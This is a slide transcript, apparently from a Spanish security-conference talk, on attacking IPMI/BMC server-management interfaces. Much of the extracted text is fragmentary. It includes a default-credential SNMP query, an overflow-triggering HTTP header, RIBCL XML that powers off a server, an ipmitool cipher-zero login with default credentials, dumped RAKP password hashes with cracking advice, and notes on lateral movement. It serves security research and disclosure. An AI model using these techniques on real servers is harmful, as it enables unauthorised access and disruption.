de ipmi - cybercamp.es
TRANSCRIPT
![Page 1: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/1.jpg)
La
de IPMIInsoportable levedad
![Page 2: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/2.jpg)
![Page 3: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/3.jpg)
![Page 4: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/4.jpg)
Bienvenido
delAL MUNDO
Hardware INFINITO
![Page 5: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/5.jpg)
![Page 6: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/6.jpg)
![Page 7: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/7.jpg)
![Page 8: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/8.jpg)
![Page 9: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/9.jpg)
![Page 10: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/10.jpg)
![Page 11: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/11.jpg)
![Page 12: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/12.jpg)
IMMUNITY Argentina
Nico Waisman
VP de LATAM Immunity, Inc
InvestigadorCon un cierto amor por la
HEAP
Quien Soy?
@nicowaisman
![Page 13: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/13.jpg)
IPMI
IntelligenceI
P
M
I
Platform
Managment
Interface
![Page 14: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/14.jpg)
I P
M I
Independencia del Sistema OperativoManejo RemotoMonitoreo:
TemperaturaVoltajeVentiladores
![Page 15: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/15.jpg)
![Page 16: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/16.jpg)
![Page 17: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/17.jpg)
I P
M I
Full Network StackKVMConsola SerialPower Managment
![Page 18: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/18.jpg)
(O un Backdoor)
![Page 19: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/19.jpg)
![Page 20: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/20.jpg)
Mientras tu
este enchufadoSERVER
TU IPMI ESTA CORRIENDO
![Page 21: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/21.jpg)
![Page 22: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/22.jpg)
![Page 23: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/23.jpg)
![Page 24: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/24.jpg)
![Page 25: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/25.jpg)
El Placerde
AuditarIPMI
![Page 27: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/27.jpg)
Necesitamos explotarlo remotamente
27
PRE AUTENTICACION
![Page 28: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/28.jpg)
NEC v850HP ILO 2
ThreadX
![Page 29: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/29.jpg)
ARMHP ILO 4
GHS INTEGRITY
![Page 30: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/30.jpg)
SUPER HIMM/IDRAC
LINUX
![Page 31: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/31.jpg)
ARM
SUPERMICRO
LINUX
![Page 32: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/32.jpg)
Cada ciclo de CPU que desperdicias no fuzzeando, dios mata un gatito
32
FUZZEAR
![Page 33: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/33.jpg)
Se encuentran Perlas
33
LEER DOCUMENTACION
![Page 34: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/34.jpg)
Y TODO LO QUE APRENDAS, AL FUZZER!
34
AUDITA
![Page 35: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/35.jpg)
Attack Surface
![Page 36: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/36.jpg)
SMASH
UDP/161,162
SNMP
TCP/22
HTTPS IPMI OTROS
TCP/80,443 UDP/623 Standalone WSMAN
KVM
VNC
![Page 37: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/37.jpg)
SMASH
Línea de Comando estandarizada por DTMFCorre sobre SSHLa mayoría de los potenciales ataques, son post autenticación
![Page 38: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/38.jpg)
SMASH
![Page 39: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/39.jpg)
SMASH
HABILITA UNA CONSOLA REMOTA! :DTEXTCONS
![Page 40: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/40.jpg)
SMASH
https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
![Page 41: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/41.jpg)
SNMP
Protocolo para organización y recolección de informaciónProtocolo Stateless“Autentica” con una community string
![Page 42: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/42.jpg)
SNMP
HP ILO2
HP ILO4
DELL IDRAC
LENOVO IMMv2
3/4 IPMI
como suUTILIZABAN “PUBLIC”
Community string
![Page 43: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/43.jpg)
SNMP
$ snmpwalk -v1 -c public 192.168.1.21
![Page 44: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/44.jpg)
SNMP
$ snmpwalk -v1 -c public -m "./immalert.mib" 192.168.1.129
![Page 45: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/45.jpg)
SNMP
![Page 46: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/46.jpg)
HTTPS
Uno de los target más interesantesPreferido por sysadmin y firewalls, abierto por default
Mayoria utiliza appwebSin embargo, algunos decidieron implementar su propio server
![Page 47: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/47.jpg)
HTTPS
Fabien Perigaud from synacktiv
![Page 48: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/48.jpg)
HTTPS
sscanf(heap_buf, “%*s %s”, httpbuffer);
Triggeable con HTTP Header...
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
![Page 49: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/49.jpg)
HTTPSint main ( void ) { char name [128] , pwd [24]; char * temp ; // ... initialize ... temp = cgiGetVariable (" name "); strcpy ( name , temp ); temp = cgiGetVariable (" pwd "); strcpy ( pwd , temp ); // ... validate user ... }
SuperMicro/login.cgi
https://jhalderm.com/pub/papers/ipmi-woot13.pdf
![Page 50: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/50.jpg)
HTTPS
(Solo en HP ILO)
URL/cgi-bin/discover(Solo en iDRAC)
URL/xmldata?item=all
![Page 51: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/51.jpg)
HTTPS
Nos abre también la superficie de ataque para otros protocolos:
WS-MAN
Redfish
RIBCL
![Page 52: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/52.jpg)
HTTPS
REDFish es una API RESTful creada por DTMF y soportado por muchos IPMI
Utiliza JSON para comunicarse
Los endpoints se encuentran en /redfish/v1/
![Page 53: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/53.jpg)
HTTPS
![Page 54: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/54.jpg)
HTTPS
RIBCL permite escribir scripts de XML para configurar el server, monitorear el estado, etcUtiliza el endpoint /RIBCL que se accede sin autenticarEl XML mismo se encarga de la autenticacion
![Page 55: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/55.jpg)
HTTPS
Administradores no suelen crear sus propios XML, utilizan…
CPQLOCFG Se conecta con el endpoint
HPONCFG Crea un XML local
![Page 56: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/56.jpg)
HTTPS
<RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="ADMIN" PASSWORD="ADMIN">
<SERVER_INFO MODE="write">
<SET_HOST_POWER HOST_POWER="No"/>
</SERVER_INFO>
</LOGIN>
</RIBCL>
Apaga el equipo
![Page 57: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/57.jpg)
HTTPS
Utilizan algún tipo de analizador léxico sólido Invertimos unos ciclos de radamsa pero desistimos por un mejor target
![Page 58: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/58.jpg)
HTTPS
radamsa validcases/* -o testcases/case%n -n 10000
radamsa es siempre el primer paso
De ejemplo válidos a casos de fuzzeo en 2 minutos
Incluye una variedad de permutadores para fuzzear
![Page 59: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/59.jpg)
HTTPS
<RIBCL VERSION="2.0"><LOGIN><RIBCL VERSION="2.0"><RIBCL VERSION="2.0">
<LOGIN USER_LOGIN="admin" PASSWORD="ADMIN">
<RIB_INFO MODE="write">
</RIB_INFO>
</LOGIN>
</RIBCL></LOGIN>
</RIBCL></LOGIN>
![Page 60: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/60.jpg)
WSMAN
Web Service ManagementMicrosoft provee soporte nativo (Win-RM)Sintaxis similar a XML, pero con pequeñas variantes (basado en SOAP)Bastante utilizado por su soporte en powershell
![Page 61: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/61.jpg)
WSMAN
No está atado a una capa de transporte Generalmente sobre HTTP/HTTPS bajo el endpoint /wsman
Pero puede correr standalone en tcp/5985
![Page 62: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/62.jpg)
WSMAN
Al correr sobre protocolo con estado, es más confiable que SNMP/IPMI
Autentica: Basic Auth, Digest-Auth, Kerberos
![Page 63: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/63.jpg)
Por razones
algunos IPMIINEXPLICABLES
Permiten acceder aL parsersin autenticar
![Page 64: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/64.jpg)
WSMAN
SuperMicro usa la version 2.1.0Vulnerable a mas de un OverflowPrepárense para un viaje a los 90
![Page 65: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/65.jpg)
WSMAN
![Page 66: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/66.jpg)
WSMAN
![Page 67: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/67.jpg)
WSMAN
Pero otros IPMI utilizan versiones más nuevas...
![Page 68: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/68.jpg)
WSMAN
![Page 69: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/69.jpg)
Los IPMI tienen un protocolo que se llama IPMI UDP/623Serie de interfaces que permiten hacer todo lo que la interfaz provee
IPMI
Incluyendo una Consola Serial por UDP...
![Page 70: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/70.jpg)
2013 la revista ITWorld lo llamó el protocolo más peligroso del mundo
IPMI
Puramente sobre UDP, utiliza un SessionID y Secuence Number para mantener un mínimo estado
![Page 71: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/71.jpg)
En una red interna (o no tanto)
71
IDENTIFICANDO IPMI
![Page 72: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/72.jpg)
IPMI
Get Channel Authentication Capabilities Get Channel Authentication
Capabilities
IPMI v2.0 / RCMP+
![Page 73: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/73.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
00 00 00 00 00 00 00 00 00
Request: <<Get Channel Authentication Capabilities>>
![Page 74: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/74.jpg)
IPMI
06 00 FF 07
Request: <<Get Channel Authentication Capabilities>>
Version
![Page 75: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/75.jpg)
IPMI
06 00 FF 07
Request: <<Get Channel Authentication Capabilities>>
Tipo: RCMP/ASF
![Page 76: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/76.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
Request: <<Get Channel Authentication Capabilities>>
Autenticacion
![Page 77: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/77.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
Request: <<Get Channel Authentication Capabilities>>
Nro Secuencia{
![Page 78: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/78.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
Request: <<Get Channel Authentication Capabilities>>
SESION
{
![Page 79: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/79.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
Request: <<Get Channel Authentication Capabilities>>
Length
![Page 80: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/80.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
20 18 c8 81 00 38 8E 04 B5
Request: <<Get Channel Authentication Capabilities>>
COMANDO
![Page 81: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/81.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 09
20 18 c8 81 00 38 8E 04 B5
Request: <<Get Channel Authentication Capabilities>>
PRIVILEGIOS REQUERIDOS
![Page 82: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/82.jpg)
IPMI
06 00 FF 07
00 00 00 00 00 00 00 00 00 10
81 1C 63 20 00 38 00 02 80
Response: <<Get Channel Authentication Capabilities>>
00 00 10
14 02 00 00
CompatibilidadMD5, MD2, PlainTXT, NoAuth, Null User, Version IPMI
![Page 83: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/83.jpg)
Indica la versión de IPMI (v2.0/v1.5), soporte OEMTipos de autenticación:
Sin Autenticación
IPMI
MD2MD5IPMI v2.0
USUARIO NULL
![Page 84: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/84.jpg)
ipmitool -I lanplus -C0 -H IP-U root -P calvin SDR
IPMI
Sin Autenticación
* Parte del gran trabajo de Dan Farmer!
![Page 85: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/85.jpg)
![Page 86: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/86.jpg)
![Page 87: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/87.jpg)
IPMI
Open Session RequestOpen Session Response
IPMI v2.0 / RCMP+
Local Session IDRemote Session ID
![Page 88: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/88.jpg)
IPMI
Open Session RequestOpen Session Response
IPMI v2.0 / RCMP+
RAKP MSG #1RAKP MSG #2
UserNameLOCAL RANDOM VALUE GUID
SERVER RANDOM VALUEHASHED PASSWORD
![Page 89: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/89.jpg)
IPMI
Open Session RequestOpen Session Response
IPMI v2.0 / RCMP+
RAKP MSG #1
RAKP MSG #3
RAKP MSG #2
RAKP MSG #4Authentication CODE
![Page 90: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/90.jpg)
IPMI
Open Session RequestOpen Session Response
IPMI v2.0 / RCMP+
RAKP MSG #1RAKP MSG #2
UserNameLOCAL RANDOM VALUE GUID
SERVER RANDOM VALUEHASHED PASSWORD
![Page 91: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/91.jpg)
Hash con RKAP-HMAC-SHA1Con el SALT
IPMI
HMAC( LocalSession ID, RemoteSession ID, Local Random Bytes, Remote Random Bytes, Remote GUID, Username)
* Parte del gran trabajo de Dan Farmer!
![Page 92: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/92.jpg)
IPMI
$ python dump_RAKP.py 10.10.0.3Found: 10.10.0.3 admin:$rakp$54414378432c5a416a7368a6b17c8288471355413cd1659b792400002f570000b85f0000f63a000036353430383155534533333845584236140561646d696e$6668a4a555989a3831e901ab85087a885b9bb91fFound: 10.10.0.3 ADMIN:$rakp$544143787366cf39332ceb225659e645390b66a8776af6751658000082470000f60400000820000036353430383155534533333845584236140541444d494e$74487c1803039a45c20e085284a10bda38c75b79
![Page 93: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/93.jpg)
Se puede crackear con john o hashcat
IPMI
https://medium.com/@iraklis/running-hashcat-v4-0-0-in-amazons-aws-new-p3-16xlarge-instance-e8fab4541e9b
$24.48 por hora en un AWS
![Page 94: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/94.jpg)
DELL iDrac cometieron un error al no hacer los SessionID randomUtilizaba un formato con la mitad de los caracteres fijo 0x0200XXYY
IPMI
* https://labs.mwrinfosecurity.com/blog/cve-2014-8272/
Como resultado, se podían predecir e inyectar comandos
![Page 95: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/95.jpg)
KVM
Escucha en el puerto TCP/17990Utilizado por Java Applet dentro de laInterfaz webTODO
![Page 96: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/96.jpg)
In the WILD!
![Page 97: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/97.jpg)
![Page 98: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/98.jpg)
![Page 99: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/99.jpg)
![Page 100: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/100.jpg)
![Page 101: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/101.jpg)
![Page 102: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/102.jpg)
![Page 103: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/103.jpg)
O COMO MOVERSE CON IMPUNIDAD POR LAS DMZ103
MOVIMIENTO TRANSVERSAL
![Page 104: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/104.jpg)
![Page 105: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/105.jpg)
![Page 106: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/106.jpg)
#1 Hackeando al sysadmin
![Page 107: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/107.jpg)
#2 Hackeando un IPMI
![Page 108: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/108.jpg)
#3 desde internet hackeando server
![Page 109: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/109.jpg)
I P
M I
Una vez hackeado el IPMI, podemos acceder al server?
Si! De muchas formas!Consola Serial
Montar un DVD remotamente
KVM (Vnc, protocolo propio, etc)
![Page 111: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/111.jpg)
#2 Hackeando un IPMI
![Page 112: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/112.jpg)
I P
M I
Una vez hackeado el server... podemos acceder al IPMI?
Si! De muchas formas!Driver del sistema operativo permite crear usuarios
Driver permite flashear firmware
![Page 113: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/113.jpg)
I P
M I
root@xdev:~# ./CP018561.scexe
FLASH_iLO3 v1.09 for Linux (Jan 23 2013)(C) Copyright 2002-2013 Hewlett-Packard Development Company, L.P.Firmware image: ilo3_155.binCurrent iLO 3 firmware version 1.26; Serial number ILOUSE116ND7G
Component XML file: CP018561.xmlCP018561.xml reports firmware version 1.55This operation will update the firmware on theiLO 3 in this server with version 1.55.Continue (y/N)?yCurrent firmware is 1.26 (Aug 26 2011 )Firmware image is 0x801664(8394340) bytesCommitting to flash part...******** DO NOT INTERRUPT! ********Flashing completed.Attempting to reset device. Succeeded.***** iLO 3 reboot in progress (may take up to 60 seconds.)***** Please ignore console messages, if any.iLO 3 reboot completed.root@xdev:~#
![Page 114: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/114.jpg)
#3 desde internet hackeando server
![Page 115: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/115.jpg)
Queda
porMuchisimo
ANALIZAR
![Page 116: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/116.jpg)
I P
M I
Varios protocolos pendientes y propietarios
Desarrollar exploits de bugs encontrados Remoto
Alternativas para movimiento transversal
Herramientas para manejo masivo de server
Escalada de privilegio
![Page 117: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/117.jpg)
O COMO MOVERSE CON IMPUNIDAD POR LAS DMZ117
CUIDADO!!
![Page 118: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/118.jpg)
Preguntas?@nicowaisman
![Page 119: de IPMI - cybercamp.es](https://reader030.vdocumento.com/reader030/viewer/2022012016/61da93a0c912cd1b0f5dff52/html5/thumbnails/119.jpg)
Nunca es uno, sino un equipoGracias
MatiasOren, rod, ivan, juan
@nicowaisman